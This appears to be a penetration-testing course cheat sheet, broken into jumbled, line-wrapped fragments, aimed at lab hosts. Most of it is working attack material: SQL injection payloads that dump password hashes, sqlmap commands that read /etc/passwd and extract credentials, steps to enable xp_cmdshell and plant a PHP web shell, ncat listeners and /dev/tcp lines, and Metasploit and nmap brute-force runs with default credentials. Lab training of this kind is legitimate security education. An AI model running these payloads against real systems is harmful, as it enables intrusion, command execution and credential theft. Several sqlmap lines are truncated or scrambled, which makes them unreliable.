Professional Documents
Culture Documents
# SQL Injection #
#################
http://10.250.100.221/
http://10.250.100.221/bookdetail.aspx?id=2
http://10.250.100.221/bookdetail.aspx?id=2'
http://10.250.100.221/bookdetail.aspx?id='
http://10.250.100.221/bookdetail.aspx?id=(2)
http://10.250.100.221/bookdetail.aspx?id=(4-2)
http://10.250.100.221/bookdetail.aspx?id=(4-1)
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-NOTE: "N" - just means to keep going until you run out of databases
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysob
jects where xtype=char(85))-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysob
jects where xtype=char(85) and name>'bookmaster')-http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysob
jects where xtype=char(85) and name>'sysdiagrams')-http://10.250.100.221/bookdetail.aspx?id=2 order by 100-http://10.250.100.221/bookdetail.aspx?id=2 order by 50-http://10.250.100.221/bookdetail.aspx?id=2 order by 25-http://10.250.100.221/bookdetail.aspx?id=2 order by 10-http://10.250.100.221/bookdetail.aspx?id=2 order by 5-http://10.250.100.221/bookdetail.aspx?id=2 order by 6-http://10.250.100.221/bookdetail.aspx?id=2 order by 7-http://10.250.100.221/bookdetail.aspx?id=2 order by 8-http://10.250.100.221/bookdetail.aspx?id=2 order by 9-http://10.250.100.221/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9-http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9-http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,
5,6,7,8,9-http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@
servername,5,6,7,8,9-http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@
servername,5,6,db_name(0),8,9-http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@
servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.s
ql_logins--
###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
3 - Total Characters
http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:0
0:10'-http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:0
0:10'-http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:0
0:10'-- (+10 seconds)
D - 1st Character
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1
)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1
)))=98) WAITFOR DELAY '00:00:10'-http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1
)))=99) WAITFOR DELAY '00:00:10'-http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1
)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
B - 2nd Character
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1
)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1
)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
O - 3rd Character
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1
)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1
)))>115) WAITFOR DELAY '00:00:10'-http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1
)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1
)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1
)))=109) WAITFOR DELAY '00:00:10'-http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1
)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
##########
# Sqlmap #
##########
cd /home/strategicsec/toolz/sqlmap-dev/
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
bles
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
-b
--current-user
--current-db
--dbs
-D BookApp --ta
-D BookApp -T B
OOKMASTER --columns
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
ysdiagrams --columns
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
OOKMASTER --columns --dump
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
ysdiagrams --columns --dump
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2"
ords
-D BookApp -T s
-D BookApp -T B
-D BookApp -T s
--users --passw
Enabling XP-Command Shell (in your web browswer type the following URL)
http://10.250.100.221/bookdetail.aspx?id=2;exec master..sp_configure 'show advan
ced options',1;reconfigure;exec master..sp_configure 'xp_cmdshell',1;reconfigure
-##############################################
##################################
############
# Executing System Commands With xp_cmdshell #
##############################################
Go to the address below in firefox:
http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'ping -n 8 1
27.0.0.1'-Go to the address below in firefox:
http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'dir+>+c:\in
etpub\wwwroot\dir_yourname-was-here.txt'--
Check it
-------http://10.250.100.221/dir_yourname-was-here.txt
Check it
-------http://10.250.100.221/ipconfig_yourname-was-here.txt
Check it
-------http://10.250.100.221/netstat_yourname-was-here.txt
In order to perform union-based sql injection - we must first determine the numb
er of columns in this query.
We do this using the ORDER BY
http://10.250.100.115/acre2.php?lap=acer' order by 100-- +
Page returns the following error:
Unknown column '100' in 'order clause'
Now we negate the parameter value 'acer' by turning into the word 'null':
http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
We see that a 4 and a 5 are on the screen. These are the columns that will echo
back data
Now we build out the union all select statement with the correct number of colum
ns
Reference:
http://www.techonthenet.com/sql/union.php
Here we see that do not have parameter passing, but we can see what we type.
http://10.250.100.115/career.php
Tried XSS, but that didn't - then noticed that we can upload a file.
Go to http://www.open-labs.org/
Download yourname_webkit
http://www.open-labs.org/yourname_webkit02.tar.gz
Upload cmd.php or list.php...now you have find it!!!!! Where is it????
Tried a bunch of dirs - finally found it in /resume:
http://10.250.100.115/resume/cmd.php
Try the following commands:
/sbin/ifconfig
uname -a
id
cat /etc/passwd
Here we see parameter passing, but this one is actually a yes to question number
3 (reference a file)
http://10.250.100.115/showfile.php?filename=about.txt
3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --current-db -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --privileges -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --dbs -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --tables -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/
issue -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/
passwd -v 3
###################################
# Root Method 1: Find Credentials #
###################################
http://10.250.100.115/resume/cmd.php
ls -lsa
ls -lsa /var/www/html/
Find a file called dbconnect.php
cat /var/www/html/dbconnect.php
or
http://10.250.100.115/showfile.php?filename=dbconnect.php
#######################################
# Root Method 2: Privilege Escalation #
#######################################
start listener on your machine
ncat -l -v -p 1234
cd /tmp
http://www.exploit-db.com/exploits/9479/
Linux Lab 1:
-----------On your Windows host type this:
ncat -l -vv -p 4321 > see.txt
On your Linux host type this:
echo "see this" > /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/4321
Linux Lab 2:
-----------On your Windows host type this:
ncat -l -vv -p 1234
Linux Lab 3:
-----------port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.250.100.221/$port; [ $?
== 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
cat /tmp/ports.txt
Lab 4:
-----On your Windows host type this:
ncat -l -vv -p 31337
ncat -l -vv -p 1337
Type commands on the 31337 listener, and see the output on the 1337 listener
./msfconsole
use auxiliary/admin/mssql/mssql_sql
show options
set RHOST 10.250.100.221
set username sa
set password database
exploit
use auxiliary/admin/mssql/mssql_enum
show options
set RHOST 10.250.100.221
set username sa
set password database
exploit
use auxiliary/admin/mssql/mssql_exec
show options
set RHOST 10.250.100.221
set password database
set CMD cmd.exe /c ping localhost
exploit
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 10.250.100.221
run
use auxiliary/admin/mssql/mssql_enum
set RHOSTS 10.250.100.221
run
set CMD
run
ipconfig
MS-SQL
nmap -sV -p 1433 --script=ms-sql-info 10.250.100.221
nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=userlist.txt,passdb=
passwordlist.txt 10.250.100.221
nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.pa
ssword=database 10.250.100.221
MySQL